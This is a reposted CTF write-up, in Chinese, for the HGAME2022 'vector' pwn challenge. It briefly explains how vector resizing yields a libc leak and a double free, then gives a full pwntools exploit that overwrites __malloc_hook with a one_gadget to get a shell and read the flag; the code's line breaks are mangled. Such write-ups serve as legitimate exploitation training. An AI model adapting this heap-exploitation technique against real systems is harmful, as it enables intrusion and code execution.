生活随笔
收集整理的這篇文章主要介紹了
PWN-COMPETITION-HGAME2022-Week4
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
PWN-COMPETITION-HGAME2022-Week4
vector
c++寫的pwn,實(shí)現(xiàn)了vector,沒有edit功能,新增了move功能
add或move時(shí),如果輸入的下標(biāo)大于vector的size,vector會進(jìn)行resize擴(kuò)容
舊vector占用的chunk自動被free掉進(jìn)入相應(yīng)的bin,數(shù)據(jù)轉(zhuǎn)移到新vector中
利用add時(shí)的vector擴(kuò)容,free掉size大于0x410的chunk,使其進(jìn)入unsorted bin,泄露libc
利用move時(shí)的vector擴(kuò)容,可以造成新vector中有兩個(gè)元素指向同一chunk,于是可以double free
from pwn
import *
from pwnlib
.util
.iters
import mbruteforce
import itertools
import hashlib
is_remote
=1
io
=remote
("chuj.top",53180)
elf
=ELF
("./vector")
libc
=ELF
("./libc.so.6")
io
.recvuntil
("sha256(????) == ")
code
=io
.recvuntil
("\n")[:-1]
charset
= string
.printable
proof
= mbruteforce
(lambda x
: hashlib
.sha256
((x
).encode
()).hexdigest
() == code
, charset
, 4, method
='fixed')
io
.sendlineafter
("????> ",proof
)def add(index
,size
,content
):io
.sendlineafter
(">> ","1")io
.sendlineafter
("ndex?\n>> ",str(index
))io
.sendlineafter
("size?\n>> ",str(size
))io
.sendafter
("content?\n>> ",content
)
def show(index
):io
.sendlineafter
(">> ","3")io
.sendlineafter
("ndex?\n>> ",str(index
))
def free(index
):io
.sendlineafter
(">> ","4")io
.sendlineafter
("ndex?\n>> ",str(index
))
def move(index
,index_move_to
):io
.sendlineafter
(">> ","5")for i
in range(index
):io
.sendlineafter
("[1/0]\n>> ","0")io
.sendlineafter
("[1/0]\n>> ","1")if is_remote
: io
.sendlineafter
("copy to?\n>> ",str(index_move_to
))else:io
.sendlineafter
("move to?\n>> ",str(index_move_to
))add
(0,0x18,"a"*8)add
(130,0x18,"b"*8)
add
(132,0,"")
show
(132)
libc_base
=u64
(io
.recvuntil
("\x7f")[-6:].ljust
(8,"\x00"))-0x1EBFD0
print("libc_base=="+hex(libc_base
))
__malloc_hook
=libc_base
+libc
.sym
["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook
))
realloc
=libc_base
+libc
.sym
["realloc"]
print("realloc=="+hex(realloc
))
__free_hook
=libc_base
+libc
.sym
["__free_hook"]
print("__free_hook=="+hex(__free_hook
))
oggs
=[0xe6c7e,0xe6c81,0xe6c84]
ogg
=libc_base
+oggs
[0]
print("ogg=="+hex(ogg
))
for i
in range(1,5):add
(i
,0x100-8,"d"*8)
for i
in range(5,12):add
(i
,0x68,"e"*8)
add
(12,0x68,"f"*8)
add
(13,0x68,"g"*8)
move
(12,262)
for i
in range(5,12):free
(i
)
free
(12)
free
(13)
free
(262)
for i
in range(5,12):add
(i
,0x68,"e"*8)
print("__malloc_hook=="+hex(__malloc_hook
))
add
(14,0x68,p64
(__malloc_hook
-0x8))
add
(15,0x68,"P1umH0")
add
(16,0x68,"P1umH0")
print("ogg=="+hex(ogg
))
add
(17,0x68,p64
(ogg
)+p64
(realloc
))
io
.sendlineafter
(">> ","1")
io
.sendlineafter
("ndex?\n>> ",str(18))
io
.sendlineafter
("size?\n>> ",str(0))io
.sendline
("cat flag")io
.interactive
()
總結(jié)
以上是生活随笔為你收集整理的PWN-COMPETITION-HGAME2022-Week4的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。
